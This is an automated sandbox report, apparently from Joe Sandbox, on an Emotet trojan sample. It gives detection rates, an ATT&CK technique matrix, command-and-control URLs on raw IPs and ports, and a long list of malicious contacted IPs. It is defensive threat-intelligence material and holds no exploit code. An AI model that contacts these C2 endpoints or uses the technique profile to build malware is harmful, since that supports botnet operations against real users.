Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Input Capture1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API11	Windows Service2	Windows Service2	Deobfuscate/Decode Files or Information1	LSASS Memory	System Service Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution1	Logon Script (Windows)	Process Injection2	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	System Information Discovery26	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol113	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading12	Cached Domain Credentials	Security Software Discovery51	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion3	DCSync	Virtualization/Sandbox Evasion3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection2	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2ojdmC51As.exe	76%	Virustotal		Browse
2ojdmC51As.exe	70%	Metadefender		Browse
2ojdmC51As.exe	89%	ReversingLabs	Win32.Trojan.Emotet
2ojdmC51As.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.2ojdmC51As.exe.21e0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.iasrecst.exe.71052e.2.unpack	100%	Avira	HEUR/AGEN.1110377	Download File
1.2.iasrecst.exe.71279e.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.2ojdmC51As.exe.60052e.2.unpack	100%	Avira	HEUR/AGEN.1110377	Download File
1.2.iasrecst.exe.22c0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.2ojdmC51As.exe.60279e.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://5.196.108.185:8080/wGf14n07/vS3mZ/aWoW/	0%	Avira URL Cloud	safe
http://5.196.108.185:8080/wGf14n07/vS3mZ/aWoW/q	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/RWKwnR00xL9KFn/8u41u6KEQrM/jtlSmN2GQ/l	0%	Avira URL Cloud	safe
http://78.24.219.147:8080/sYVMb8sSsBN1RjvCK/iGzstLqezClQ/N1nFCPZm6mEYgboT/pmtRsMHWSucuO/QEkDfx4jkf1H	0%	Avira URL Cloud	safe
http://96.126.101.6:8080/j8688GhgZ4mpI2/	0%	Avira URL Cloud	safe
http://98.174.164.72/2CRvCvWLe/Uxu7RQJUiJql1/%	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://167.114.153.111:8080/RWKwnR00xL9KFn/8u41u6KEQrM/jtlSmN2GQ/	0%	Avira URL Cloud	safe
http://194.187.133.160:443/3El8N8aRynButJ/	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
http://98.174.164.72/2CRvCvWLe/Uxu7RQJUiJql1/	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://5.196.108.185:8080/wGf14n07/vS3mZ/aWoW/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000009.00000003.305136565.0000015674A48000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000009.00000002.305686531.0000015674A42000.00000004.00000001.sdmp	false		high
https://www.hulu.com/ca-privacy-rights	svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000009.00000003.283475151.0000015674A31000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	false		high
http://5.196.108.185:8080/wGf14n07/vS3mZ/aWoW/q	iasrecst.exe, 00000001.00000002.499375661.0000000002970000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000009.00000002.305686531.0000015674A42000.00000004.00000001.sdmp	false		high
http://www.hulu.com/terms	svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	false		high
http://167.114.153.111:8080/RWKwnR00xL9KFn/8u41u6KEQrM/jtlSmN2GQ/l	iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://en.help.roblox.com/hc/en-us	svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 00000009.00000002.305642289.0000015674A13000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://www.hulu.com/do-not-sell-my-info	svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000009.00000003.305199569.0000015674A45000.00000004.00000001.sdmp	false		high
http://78.24.219.147:8080/sYVMb8sSsBN1RjvCK/iGzstLqezClQ/N1nFCPZm6mEYgboT/pmtRsMHWSucuO/QEkDfx4jkf1H	iasrecst.exe, 00000001.00000002.499375661.0000000002970000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	false		high
https://instagram.com/hiddencity_	svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	false		high
http://96.126.101.6:8080/j8688GhgZ4mpI2/	iasrecst.exe, 00000001.00000003.327469162.0000000002981000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000009.00000003.283475151.0000015674A31000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.305206943.0000015674A40000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/parents/	svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000009.00000002.305642289.0000015674A13000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	false		high
http://98.174.164.72/2CRvCvWLe/Uxu7RQJUiJql1/%	iasrecst.exe, 00000001.00000002.499375661.0000000002970000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.xboxlive.com	svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000009.00000003.305136565.0000015674A48000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000009.00000003.283475151.0000015674A31000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
http://www.hulu.com/privacy	svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	false		high
http://crl.m	svchost.exe, 00000006.00000002.498370452.000002074589B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000006.00000002.498650900.0000020745B10000.00000002.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	false		high
http://167.114.153.111:8080/RWKwnR00xL9KFn/8u41u6KEQrM/jtlSmN2GQ/	iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://194.187.133.160:443/3El8N8aRynButJ/	iasrecst.exe, 00000001.00000003.405645710.0000000002981000.00000004.00000001.sdmp, iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.t	svchost.exe, 00000009.00000003.305136565.0000015674A48000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000009.00000002.305673394.0000015674A3A000.00000004.00000001.sdmp	false		high
https://www.roblox.com/info/privacy	svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	false		high
http://98.174.164.72/2CRvCvWLe/Uxu7RQJUiJql1/	iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com	svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
194.4.58.192	unknown	Kazakhstan	202958	HOSTER-KZ	true
102.182.93.220	unknown	South Africa	37611	AfrihostZA	true
94.200.114.161	unknown	United Arab Emirates	15802	DU-AS1AE	true
95.9.5.93	unknown	Turkey	9121	TTNETTR	true
115.94.207.99	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
89.121.205.18	unknown	Romania	9050	RTDBucharestRomaniaRO	true
200.116.145.225	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
216.139.123.119	unknown	United States	395582	GRM-NETWORKUS	true
138.68.87.218	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
220.245.198.194	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
104.131.11.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.111.60.55	unknown	Ukraine	24703	UN-UKRAINE-ASKievUkraineUA	true
24.178.90.49	unknown	United States	20115	CHARTER-20115US	true
94.23.237.171	unknown	France	16276	OVHFR	true
41.185.28.84	unknown	South Africa	36943	GridhostZA	true
139.162.108.71	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	true
186.74.215.34	unknown	Panama	11556	CableWirelessPanamaPA	true
202.134.4.216	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
120.150.218.241	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
202.134.4.211	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
87.106.139.101	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
62.30.7.67	unknown	United Kingdom	5089	NTLGB	true
123.142.37.166	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
75.143.247.51	unknown	United States	20115	CHARTER-20115US	true
49.3.224.99	unknown	Australia	4804	MPX-ASMicroplexPTYLTDAU	true
87.106.136.232	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
124.41.215.226	unknown	Nepal	17501	WLINK-NEPAL-AS-APWorldLinkCommunicationsPvtLtdNP	true
62.75.141.82	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
162.241.140.129	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
119.59.116.21	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
113.61.66.94	unknown	Australia	45510	TELCOINABOX-AULevel109HunterStreetAU	true
96.245.227.43	unknown	United States	701	UUNETUS	true
172.91.208.86	unknown	United States	20001	TWC-20001-PACWESTUS	true
37.139.21.175	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
194.187.133.160	unknown	Bulgaria	13124	IBGCBG	true
121.7.31.214	unknown	Singapore	9506	SINGTEL-FIBRESingtelFibreBroadbandSG	true
61.76.222.210	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
95.213.236.64	unknown	Russian Federation	49505	SELECTELRU	true
5.196.108.185	unknown	France	16276	OVHFR	true
76.171.227.238	unknown	United States	20001	TWC-20001-PACWESTUS	true
74.214.230.200	unknown	United States	36728	EMERYTELCOMUS	true
110.145.77.103	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
96.126.101.6	unknown	United States	63949	LINODE-APLinodeLLCUS	true
120.150.60.189	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
93.147.212.206	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
98.174.164.72	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
91.211.88.52	unknown	Ukraine	206638	HOSTFORYUA	true
172.86.188.251	unknown	Canada	32489	AMANAHA-NEWCA	true
50.35.17.13	unknown	United States	27017	ZIPLY-FIBER-LEGACY-ASNUS	true
157.245.99.39	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
75.188.96.231	unknown	United States	10796	TWC-10796-MIDWESTUS	true
167.114.153.111	unknown	Canada	16276	OVHFR	true
37.179.204.33	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
203.153.216.189	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
59.125.219.109	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	true
2.58.16.89	unknown	Latvia	64421	SERTEX-ASLV	true
62.171.142.179	unknown	United Kingdom	51167	CONTABODE	true
162.241.242.173	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
123.176.25.234	unknown	Maldives	7642	DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMV	true
50.91.114.38	unknown	United States	33363	BHN-33363US	true
61.33.119.226	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
78.24.219.147	unknown	Russian Federation	29182	THEFIRST-ASRU	true
24.179.13.119	unknown	United States	20115	CHARTER-20115US	true
173.63.222.65	unknown	United States	701	UUNETUS	true
47.36.140.164	unknown	United States	20115	CHARTER-20115US	true
110.142.236.207	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
139.99.158.11	unknown	Canada	16276	OVHFR	true
49.50.209.131	unknown	New Zealand	55853	MEGATEL-AS-APMegatelNZ	true
190.108.228.27	unknown	Argentina	27751	NeunetSAAR	true
202.141.243.254	unknown	Pakistan	9260	MULTINET-AS-APMultinetPakistanPvtLtdPK	true
121.124.124.40	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
139.59.60.244	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
61.19.246.238	unknown	Thailand	9335	CAT-CLOUD-APCATTelecomPublicCompanyLimitedTH	true
168.235.67.138	unknown	United States	3842	RAMNODEUS	true
137.59.187.107	unknown	Hong Kong	18106	VIEWQWEST-SG-APViewqwestPteLtdSG	true
78.188.106.53	unknown	Turkey	9121	TTNETTR	true
71.15.245.148	unknown	United States	20115	CHARTER-20115US	true
188.219.31.12	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
217.20.166.178	unknown	Ukraine	1820	WNETUS	true
24.230.141.169	unknown	United States	11232	MIDCO-NETUS	true
74.208.45.104	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
134.209.144.106	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
186.70.56.94	unknown	Ecuador	14522	SatnetEC	true
97.82.79.83	unknown	United States	20115	CHARTER-20115US	true
139.162.60.124	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	true
172.104.97.173	unknown	United States	63949	LINODE-APLinodeLLCUS	true
184.180.181.202	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
176.113.52.6	unknown	Russian Federation	8712	INTA-ASRU	true
68.252.26.78	unknown	United States	7018	ATT-INTERNET4US	true
201.241.127.190	unknown	Chile	22047	VTRBANDAANCHASACL	true
91.146.156.228	unknown	Hungary	8462	TARR1HU	true
24.137.76.62	unknown	Canada	11260	EASTLINK-HSICA	true
182.208.30.18	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	true
108.46.29.236	unknown	United States	701	UUNETUS	true
37.187.72.193	unknown	France	16276	OVHFR	true
209.54.13.14	unknown	United States	11492	CABLEONEUS	true
94.230.70.6	unknown	Italy	48500	IRPNET-ASIT	true
85.105.111.166	unknown	Turkey	9121	TTNETTR	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	367934
Start date:	12.03.2021
Start time:	16:25:49
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2ojdmC51As.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@16/5@0/100
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 70.4% (good quality ratio 69.6%) Quality average: 85% Quality standard deviation: 22.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 57 Number of non-executed functions: 356
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 93.184.220.29, 204.79.197.200, 13.107.21.200, 51.104.139.180, 52.147.198.201, 40.88.32.150, 104.43.139.144, 23.211.6.115, 184.30.24.56, 92.122.213.247, 92.122.213.194, 51.103.5.186, 20.82.210.154, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:26:54	API Interceptor	12x Sleep call for process: svchost.exe modified
16:28:08	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
200.116.145.225	2ojdmC51As.exe	Get hash	malicious	Browse	200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/
200.116.145.225	GM8716863026AA.doc	Get hash	malicious	Browse	200.116.145.225:443/eHRi0AsvmChNb0B/Sq2LBDG3K/dHE8SMLlJOlFGym/g6iocDdP0QPHR/
194.4.58.192	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse
94.200.114.161	test-emotet.exe	Get hash	malicious	Browse	94.200.114.161/
95.9.5.93	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse
115.94.207.99	https://contentsxx.xsrv.jp/academia/parts_service/7xg/	Get hash	malicious	Browse	115.94.207.99:443/OUnj/nu5Sn5pH6W/XCxNN4goRNgqaQshv/BH9p/alZ3dnjhwqocs6Wj/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTER-KZ	FileZilla_3.50.0_win64-setup.exe	Get hash	malicious	Browse	185.116.194.200
	0304_87496944093261.doc	Get hash	malicious	Browse	185.100.65.29
	0304_56958375050481.doc	Get hash	malicious	Browse	185.100.65.29
	Static.dll	Get hash	malicious	Browse	185.100.65.29
	msals.dll	Get hash	malicious	Browse	185.100.65.29
	Static.dll	Get hash	malicious	Browse	185.100.65.29
	msals.dll	Get hash	malicious	Browse	185.100.65.29
	0302_21678088538951.doc	Get hash	malicious	Browse	185.100.65.29
	Static.dll	Get hash	malicious	Browse	185.100.65.29
	msals.dll	Get hash	malicious	Browse	185.100.65.29
	0301_4735106192.doc	Get hash	malicious	Browse	185.100.65.29
	Hs52qascx.dll	Get hash	malicious	Browse	185.100.65.29
	0224_13930141056302.doc	Get hash	malicious	Browse	185.100.65.29
	0224_11959736734789.doc	Get hash	malicious	Browse	185.100.65.29
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse	194.4.58.192
	0217_1737094153981.doc	Get hash	malicious	Browse	185.100.65.29
	Hs52qascx.dll	Get hash	malicious	Browse	185.100.65.29
	0211_38602014674781.doc	Get hash	malicious	Browse	185.100.65.29
	0210_1723194332604.doc	Get hash	malicious	Browse	185.100.65.29
	Wh102yYa.dll	Get hash	malicious	Browse	185.100.65.29
AfrihostZA	Our REVISED Order 1032021.exe	Get hash	malicious	Browse	154.0.173.248
	payslip.exe	Get hash	malicious	Browse	169.1.24.244
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	41.76.213.144
	document-1915351743.xls	Get hash	malicious	Browse	197.242.147.47
	tems order.exe	Get hash	malicious	Browse	154.0.167.156
	INV3249732836.xlsm	Get hash	malicious	Browse	154.0.168.63
	New order.exe	Get hash	malicious	Browse	154.0.167.156
	INV6708494406.xlsm	Get hash	malicious	Browse	154.0.168.63
	SA00208.exe	Get hash	malicious	Browse	169.1.24.244
	Statement_as_of_01_FEB-2021.xlsm	Get hash	malicious	Browse	154.0.171.186
	000U0UUPOOO.exe	Get hash	malicious	Browse	154.0.170.214
	#B30COPY.htm	Get hash	malicious	Browse	154.0.175.244
